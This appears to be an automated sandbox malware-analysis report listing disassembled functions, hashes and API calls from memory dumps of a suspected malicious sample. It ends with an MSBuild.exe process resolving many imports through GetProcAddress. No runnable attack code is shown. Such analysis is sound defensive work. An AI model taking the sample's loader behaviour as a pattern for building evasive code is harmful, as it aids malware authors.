Snapshot File: hcaresult_0_2_c40000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 3bd58d190c1061049745cf6e066f2876efb9ae3aa5759163821c8ff737f8d3cc
Instruction ID: 10ba5a7b68e8883c4c12d8fcf8fb8c3b6aec5ffb29e7ff55495397cfe6b3085f
Opcode Fuzzy Hash: 3bd58d190c1061049745cf6e066f2876efb9ae3aa5759163821c8ff737f8d3cc
Instruction Fuzzy Hash: 9801F27A900614ABCF19AB64D805AED7B68FF80760F294109F91297292EF30EF41DB80

Function 00C44C38 Relevance: 7.5, APIs: 5, Instructions: 48COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00C44C44
int.LIBCPMT ref: 00C44C57

Part of subcall function 00C416FA: std::_Lockit::_Lockit.LIBCPMT ref: 00C4170B
Part of subcall function 00C416FA: std::_Lockit::~_Lockit.LIBCPMT ref: 00C41725

std::_Facet_Register.LIBCPMT ref: 00C44C8A
std::_Lockit::~_Lockit.LIBCPMT ref: 00C44CA0
Concurrency::cancel_current_task.LIBCPMT ref: 00C44CAB

Memory Dump Source

Source File: 00000000.00000002.2242759400.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.2242616972.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242989695.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243208653.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243258998.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243302692.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 5d0cf2ed1af8626d78e69b89fd076fe32e91e8be20f3111ba2601f901762900c
Instruction ID: aa7e9691c57e253d8f422daec49e0d6fa8e4e8752d7fba20d0236cd750560847
Opcode Fuzzy Hash: 5d0cf2ed1af8626d78e69b89fd076fe32e91e8be20f3111ba2601f901762900c
Instruction Fuzzy Hash: DF012636900514BBCB18AB64D845AED7768FF80764F280109FD16A72A1EF30AF41D7C0

Function 00C97036 Relevance: 7.5, APIs: 5, Instructions: 44COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00C97042

Part of subcall function 00C939D4: __getptd_noexit.LIBCMT ref: 00C939D7
Part of subcall function 00C939D4: __amsg_exit.LIBCMT ref: 00C939E4

__calloc_crt.LIBCMT ref: 00C9704D
__lock.LIBCMT ref: 00C97083
___addlocaleref.LIBCMT ref: 00C9708F
__lock.LIBCMT ref: 00C970A3

Part of subcall function 00C92B74: __getptd_noexit.LIBCMT ref: 00C92B74

Memory Dump Source

Source File: 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.2242616972.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242759400.0000000000C41000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242989695.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243208653.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243258998.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243302692.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: __getptd_noexit__lock$___addlocaleref__amsg_exit__calloc_crt__getptd
String ID:
API String ID: 2820776222-0
Opcode ID: b668459250dba2172e2c4039f6cfa7733fed99fad082a545e312b10aae0848bc
Instruction ID: 0fc2fd8bc93aeefc14fd3ef56dd172af44070e640d901f397f3044dbab8df034
Opcode Fuzzy Hash: b668459250dba2172e2c4039f6cfa7733fed99fad082a545e312b10aae0848bc
Instruction Fuzzy Hash: 90018471515700EFEF21BFB4994B75C77A0AF04720F20531AF494972C1CF745A40AB69

Function 00C4679F Relevance: 7.5, APIs: 5, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C467A6
std::_Lockit::_Lockit.LIBCPMT ref: 00C467B1
std::_Lockit::~_Lockit.LIBCPMT ref: 00C4681F

Part of subcall function 00C46902: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00C4691A

std::locale::_Setgloballocale.LIBCPMT ref: 00C467CC
_Yarn.LIBCPMT ref: 00C467E2

Memory Dump Source

Source File: 00000000.00000002.2242759400.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.2242616972.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242989695.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243208653.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243258998.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243302692.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
String ID:
API String ID: 1088826258-0
Opcode ID: 7e0347c665d0df9ae4dfcd55722f9c601441acda47b7e52ce0a1dbc7c75a85ae
Instruction ID: e5f12ec0656e4198833653c5d9cfbc11df4cda602e1e9f65c6dcaf3f5669fab7
Opcode Fuzzy Hash: 7e0347c665d0df9ae4dfcd55722f9c601441acda47b7e52ce0a1dbc7c75a85ae
Instruction Fuzzy Hash: B801DFB5A015509BDB0AEF20D855B7C7BB1FFC6310F240009E81157386DF756E42EB92

Function 00C95799 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00C957A5

Part of subcall function 00C939D4: __getptd_noexit.LIBCMT ref: 00C939D7
Part of subcall function 00C939D4: __amsg_exit.LIBCMT ref: 00C939E4

__getptd.LIBCMT ref: 00C957BC
__amsg_exit.LIBCMT ref: 00C957CA
__lock.LIBCMT ref: 00C957DA
__updatetlocinfoEx_nolock.LIBCMT ref: 00C957EE

Memory Dump Source

Source File: 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.2242616972.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242759400.0000000000C41000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242989695.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243208653.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243258998.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243302692.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: 3ca1aa4fc0945ad2b9bfdc36e3f8cce4979dbeb0600ceb255b48c050cbe74efe
Instruction ID: 1f3ba834ccb3ed9c10a243ae636668f6898661307e8cbf65446e07a064206308
Opcode Fuzzy Hash: 3ca1aa4fc0945ad2b9bfdc36e3f8cce4979dbeb0600ceb255b48c050cbe74efe
Instruction Fuzzy Hash: 5BF0BB32914B14DBDF23BBB4644B75D76D06F00725F21015AF464A72D2DB746B00EB6D

Function 00C4CA32 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00C4C9E3,00000000,?,00CD0EE4,?,?,?,00C4CB86,00000004,InitializeCriticalSectionEx,00C65CD0,InitializeCriticalSectionEx), ref: 00C4CA3F
GetLastError.KERNEL32(?,00C4C9E3,00000000,?,00CD0EE4,?,?,?,00C4CB86,00000004,InitializeCriticalSectionEx,00C65CD0,InitializeCriticalSectionEx,00000000,?,00C4C93D), ref: 00C4CA49
LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00C4CA71

Strings

api-ms-, xrefs: 00C4CA56

Memory Dump Source

Source File: 00000000.00000002.2242759400.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.2242616972.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242989695.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243208653.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243258998.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243302692.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 451c9c3b94809ad57d3f40c9eabf4adb33436839cdc8d2b46562059bb39475f7
Instruction ID: 232618ad7cd5a183f641c4c13d01e184ac5e0c6ef00215e76f7e73a3eb2054c6
Opcode Fuzzy Hash: 451c9c3b94809ad57d3f40c9eabf4adb33436839cdc8d2b46562059bb39475f7
Instruction Fuzzy Hash: CEE04F71681208BBEF209BB1EC86B6C3F55BB01B55F104021FA0CA80F0D7A1D9A4A584

Function 00C5836C Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(27568A11,00000000,00000000,00000000), ref: 00C583CF

Part of subcall function 00C5BA3F: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00C5B4E8,?,00000000,-00000008), ref: 00C5BAEB

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00C5862A
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00C58672
GetLastError.KERNEL32 ref: 00C58715

Memory Dump Source

Source File: 00000000.00000002.2242759400.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.2242616972.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242989695.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243208653.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243258998.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243302692.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: aae9a13fd7c30e1d80075b60d7166ff3dd8524adafe30f01c4a57944d78e816c
Instruction ID: d1552cc85fe1183f19db38f6a434eceb77be9bc19e0b6b37fd91ae3dc550a7b5
Opcode Fuzzy Hash: aae9a13fd7c30e1d80075b60d7166ff3dd8524adafe30f01c4a57944d78e816c
Instruction Fuzzy Hash: 69D14A79D006589FCB15CFA8D880AEDBBB4FF09301F18412AE965FB251DB30A949CF54

Function 00C7D04B Relevance: 6.3, APIs: 4, Instructions: 325COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C7D07C
_memset.LIBCMT ref: 00C7D09C
_memset.LIBCMT ref: 00C7D0AD
_memset.LIBCMT ref: 00C7D0BE

Memory Dump Source

Source File: 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.2242616972.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242759400.0000000000C41000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242989695.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243208653.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243258998.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243302692.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: _memset
String ID:
API String ID: 2102423945-0
Opcode ID: 6d5cfdb14ca93b367f8cc67354febb84f32da8ddccb4474df6c53db530983229
Instruction ID: 609abde040aaa8adbf2ba8842999e31e11e316b40944924e06c09aebda4b1e9c
Opcode Fuzzy Hash: 6d5cfdb14ca93b367f8cc67354febb84f32da8ddccb4474df6c53db530983229
Instruction Fuzzy Hash: 6DD1D3B291012DABDB20EB94DC82BDAB778AF04344F1494E7A91DB3051DA707F85EF61

Function 00C4BA01 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00C4BAC8
___AdjustPointer.LIBCMT ref: 00C4BAEB
___AdjustPointer.LIBCMT ref: 00C4BB87

Memory Dump Source

Source File: 00000000.00000002.2242759400.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.2242616972.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242989695.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243208653.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243258998.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243302692.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: c0580b44de775ab02a45472cceb14784fa6810163f90e927afdc4ed2f979afb8
Instruction ID: 9467e63e3d3738920475ee95cf5ffdb678e7ac9014aa97292b58f65d3d17c466
Opcode Fuzzy Hash: c0580b44de775ab02a45472cceb14784fa6810163f90e927afdc4ed2f979afb8
Instruction Fuzzy Hash: DF5125B2601306AFDB298F15D841BBA77B4FF10710F24442DEC56476A5E731EE80EB90

Function 00C872ED Relevance: 6.1, APIs: 4, Instructions: 132COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C87312
_memset.LIBCMT ref: 00C87321
_memset.LIBCMT ref: 00C874E1
_memset.LIBCMT ref: 00C874F3

Memory Dump Source

Source File: 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.2242616972.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242759400.0000000000C41000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242989695.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243208653.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243258998.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243302692.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: _memset
String ID:
API String ID: 2102423945-0
Opcode ID: e102237a281954bac3f77adf788a9415850df8a56c72ad5341f7a988880b18b0
Instruction ID: 7c6236d94a0e8bd75eef56e76ea01f704666d733dac5640644205ff8a80747a6
Opcode Fuzzy Hash: e102237a281954bac3f77adf788a9415850df8a56c72ad5341f7a988880b18b0
Instruction Fuzzy Hash: D051D8B1D0022A9BCB21EF24CC82ADDB37CAB44744F4154FAA61CB3152DB746F869F59

Function 00C853EF Relevance: 6.1, APIs: 4, Instructions: 114COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C85414
_memset.LIBCMT ref: 00C85488
_memset.LIBCMT ref: 00C854FC
_memset.LIBCMT ref: 00C85570

Memory Dump Source

Source File: 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.2242616972.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242759400.0000000000C41000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242989695.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243208653.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243258998.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243302692.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: _memset
String ID:
API String ID: 2102423945-0
Opcode ID: e6947b7988c19ba1308586bef22e4c593a96716e1a0a8d66b470caa86840c4aa
Instruction ID: dfe510401f63bde1b78dde4c62234d7269f6b6d961a7612710d588354e42b183
Opcode Fuzzy Hash: e6947b7988c19ba1308586bef22e4c593a96716e1a0a8d66b470caa86840c4aa
Instruction Fuzzy Hash: 52418071D4021DBADB14FB60DC4BFDD737CAB08704F2484A6B604E7091EAB4AA489F59

Function 00C95A35 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00C95A41

Part of subcall function 00C939D4: __getptd_noexit.LIBCMT ref: 00C939D7
Part of subcall function 00C939D4: __amsg_exit.LIBCMT ref: 00C939E4

__amsg_exit.LIBCMT ref: 00C95A61
__lock.LIBCMT ref: 00C95A71
_free.LIBCMT ref: 00C95AA1

Memory Dump Source

Source File: 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.2242616972.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242759400.0000000000C41000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242989695.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243208653.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243258998.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243302692.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: __amsg_exit$__getptd__getptd_noexit__lock_free
String ID:
API String ID: 3170801528-0
Opcode ID: ab098f317f1d6403d4eab1e077bccdc6c3e90b0e722674e65a2ad964507e55dc
Instruction ID: a622ca49ad34c428ca2a2ea983079ce1ad4d87c22b5760576362838fdd741e73
Opcode Fuzzy Hash: ab098f317f1d6403d4eab1e077bccdc6c3e90b0e722674e65a2ad964507e55dc
Instruction Fuzzy Hash: 30018431E01B11ABCF22BB65A48976E7760BF04710F151256E825672D1CF34AE41EFDD

Function 00C621E7 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,00000000,?,00C611A6,00000000,00000001,00000000,00000000,?,00C58769,00000000,00000000,00000000), ref: 00C621FE
GetLastError.KERNEL32(?,00C611A6,00000000,00000001,00000000,00000000,?,00C58769,00000000,00000000,00000000,00000000,00000000,?,00C58CF0,00000000), ref: 00C6220A

Part of subcall function 00C621D0: CloseHandle.KERNEL32(FFFFFFFE,00C6221A,?,00C611A6,00000000,00000001,00000000,00000000,?,00C58769,00000000,00000000,00000000,00000000,00000000), ref: 00C621E0

___initconout.LIBCMT ref: 00C6221A

Part of subcall function 00C62192: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00C621C1,00C61193,00000000,?,00C58769,00000000,00000000,00000000,00000000), ref: 00C621A5

WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,?,00C611A6,00000000,00000001,00000000,00000000,?,00C58769,00000000,00000000,00000000,00000000), ref: 00C6222F

Memory Dump Source

Source File: 00000000.00000002.2242759400.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.2242616972.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242989695.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243208653.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243258998.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243302692.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 55701cca4f4ddddc1279e932217d34144aea059d0caecd1c04a6a97b634813aa
Instruction ID: 0a40726696c1ed6bdc490e3d9f294e5ad847c2c934f9ef45c4d78d7f2ec3fcd7
Opcode Fuzzy Hash: 55701cca4f4ddddc1279e932217d34144aea059d0caecd1c04a6a97b634813aa
Instruction Fuzzy Hash: 77F0AC36504524FBCF361FE6EC58B9D7F66EB097B1B048015FF1D95121C6728D20ABA1

Function 00C4B6F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 00C4B72F
__IsNonwritableInCurrentImage.LIBCMT ref: 00C4B7E3

Strings

csm, xrefs: 00C4B7CD

Memory Dump Source

Source File: 00000000.00000002.2242759400.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.2242616972.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242989695.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243208653.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243258998.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243302692.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 3480331319-1018135373
Opcode ID: 10311532c7521143fb0b7b5b602f7e2f49a685f866219a964a59e9233afc1422
Instruction ID: 90f3151d9c56ec96d2607e610dea5cce712bbe7626b64e061f11fc43887528b9
Opcode Fuzzy Hash: 10311532c7521143fb0b7b5b602f7e2f49a685f866219a964a59e9233afc1422
Instruction Fuzzy Hash: D741A634A00218AFCF10DF69C885A9EBFB5FF45314F148065E924AB392D775EE15CBA0

Function 00C4BFFD Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?), ref: 00C4C022

Strings

MOC, xrefs: 00C4C034
RCC, xrefs: 00C4C03C

Memory Dump Source

Source File: 00000000.00000002.2242759400.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.2242616972.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242989695.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243208653.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243258998.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243302692.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 39512f89b1cdc3f7c889c1255f7e44ba5c8ba35c10b1bb119471a3f26ff7600b
Instruction ID: f148cd8eba787d8227e5afec191d9402a51a6497dfdd6cfdbc31e0393094f9d8
Opcode Fuzzy Hash: 39512f89b1cdc3f7c889c1255f7e44ba5c8ba35c10b1bb119471a3f26ff7600b
Instruction Fuzzy Hash: 93413772901209EFCF26DF98CD81AAEBBB5FF48304F188099F914A7262D7359A50DB50

Function 00C41625 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00C4162C
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00C41664

Part of subcall function 00C4689D: _Yarn.LIBCPMT ref: 00C468BC
Part of subcall function 00C4689D: _Yarn.LIBCPMT ref: 00C468E0

Strings

bad locale name, xrefs: 00C41672

Memory Dump Source

Source File: 00000000.00000002.2242759400.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.2242616972.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242989695.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243208653.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243258998.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243302692.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 1908188788-1405518554
Opcode ID: 6c1eeb31dc64ee9763e3543a3d82e9ed4413d65b25c584b13ae52489892b4326
Instruction ID: 8678f7f36e5b77a6467fec2ca0b65cd3be66c0974917c28b3908cf2d34f5ef4a
Opcode Fuzzy Hash: 6c1eeb31dc64ee9763e3543a3d82e9ed4413d65b25c584b13ae52489892b4326
Instruction Fuzzy Hash: A1F0B771505B809E83319F7A9481447FBE4BE293107948A7FE1DEC3A12D731E948DBAA

Analysis Process: MSBuild.exePID: 4788, Parent PID: 4712COMMON

Execution Graph

Execution Coverage:	4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	3.7%
Total number of Nodes:	2000
Total number of Limit Nodes:	30

Executed Functions

Function 00418ADE Relevance: 231.5, APIs: 121, Strings: 11, Instructions: 518
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(75900000,00417456), ref: 00418AF2
GetProcAddress.KERNEL32 ref: 00418B09
GetProcAddress.KERNEL32 ref: 00418B20
GetProcAddress.KERNEL32 ref: 00418B37
GetProcAddress.KERNEL32 ref: 00418B4E
GetProcAddress.KERNEL32 ref: 00418B65
GetProcAddress.KERNEL32 ref: 00418B7C
